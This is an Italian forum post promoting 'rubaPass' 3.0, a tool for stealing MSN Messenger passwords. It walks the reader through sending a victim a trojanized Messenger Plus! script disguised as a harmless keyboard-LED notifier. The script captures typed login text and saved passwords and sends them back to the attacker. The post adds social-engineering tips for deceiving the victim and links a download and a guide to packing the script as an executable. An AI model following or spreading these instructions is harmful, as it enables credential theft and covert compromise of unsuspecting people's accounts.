Dopo ben 4 mesi di fermo il mio ormai noto script per trovare le password di Messenger si aggiorna! rubaPass è infatti arrivato alla versione 3 ed è ormai diventato praticamente infallibile...
Vediamo subito come prendere la password di Messenger di un nostro contatto!

Nome: rubaPass
Autore: Suxsem
Versione corrente: 3.0.0
Download: [allegato a questo messaggio]

Premesse
1) Chi usa lo script se ne assume la completa responsabilità
2) Il sistema si basa sull'invio di uno script (non rubaPass) alla vostra "vittima"...se riuscite a farglielo installare siete già alla fine dell'opera
3) La vittima non deve avere Windows Vista
4) Nel 95% dei casi la "vittima" non saprà di essere stata fregata e tanto meno che lo è stata da voi
5) Per ora lo script è stato testato con versioni di Messenger antecedenti alla 9 beta e non sono stati rilevati problemi. Appena sarà possibile verrà pubblicata la compatibilità (comunque probabile) o meno con Messenger 9

Usare lo script
Vediamo un po' come prendere le password di Messenger...
1) Installiamo sul NOSTRO PC lo script rubaPass
2) Apriamo una conversazione con la vittima e dal menù dello script (accessibile tramite un pulsante con 3 cubetti posto vicino a quello per inviare trilli) scegliamo la voce "Invia keyFlasher"
3) Aspettiamo che la vittima accetti ed installi lo script (in caso la vittima non si fidi è possibile convertire lo script (non rubaPass...ma keyFlasher...contenuto in C:\Programmi\Messenger Plus! Live\Scripts\rubaPass) in eseguibile attraverso questa guida: http://hackeco.forumfree.net/?t=33027321)
4) Aspettiamo il logout ed il successivo login della vittima (aspettiamo ke esca e rientri in MSN)
5) Inviamo un messaggio qualunque alla vittima e aspettiamo il toast (messaggino in basso a destra al nostro schermo) che ci dirà quando è possibile proseguire (in ogni caso dopo 10 secondi circa)
6) Scegliamo dal menù dello script la voce "Richiedi password"
7) Aspettiamo il messaggio "£nd" che uscirà nella finestra di conversazione e accettiamo tutti i file che ci vengono inviati
8) (Opzionale) E' consigliabile inviare il comando "Inibisci keyFlasher remoto" accessibile dal menù dello script per trasformare lo script che avete inviato alla vittima da un sistema per fregargli la password ad un semplice script (vedi "Informazioni aggiuntive" sotto per saperne di più)
9) Abbiamo finito (leggi sotto per sapere cosa fare con i file ricevuti)...sarà possibile tornare a parlare normalmente con la vittima solo dal suo prossimo accesso a Messenger

Analizzare i file ricevuti
Se tutto è andato bene avremo ottenuto 2 file: msgXs.txt e msgXs.rbp
Entrambi andranno aperti con "Blocco note" di Windows
Il primo (msgXs.txt) contiene il testo digitato dalla vittima durante l'accesso a MSN (a meno che non l'abbia salvata, l'avrà digitata in quel momento per accedere e voi la riceverete; se ha la funzione salva password attiva questo file sarà vuoto);
Il secondo /msgXs.rbp) contiene un elenco di tutte le password di MSN salvate sul PC col relativo indirizzo email;
Sarà quindi possibile recuperare la password della vittima sia se essa ha la funzione salva password abilitata sia se la ha disabilitata

Informazioni aggiuntive
1) Per non destare sospetti nella vittima lo script maligno che le invierete possiede anke alcune vere funzionalità...utili per la vittima. Per sapere a cosa serve il "falso" script puoi clikkare qui: http://www.msgpluslive.it/scripts/view/412-Key-Flasher/ (in sintesi: fa lampeggiare i LED della tastiera quando si riceve un messaggio)
2) Attraverso il comando "Invia descrizione keyFlasher" disponibile nel menù dello script è possibile inviare alla vittima (nel caso essa la chiedesse) una breve descrizione del "finto" script racchiuso nello script che gli invierete
3) Nel caso la vittima abbia già provato lo script keyFlasher originale potete sempre inventarvi che l'avete modificato e migliorato e volete un suo parere sul vostro lavoro
Download http://hackeco.forumfree.net/?act=Attach&type=post&id=274685917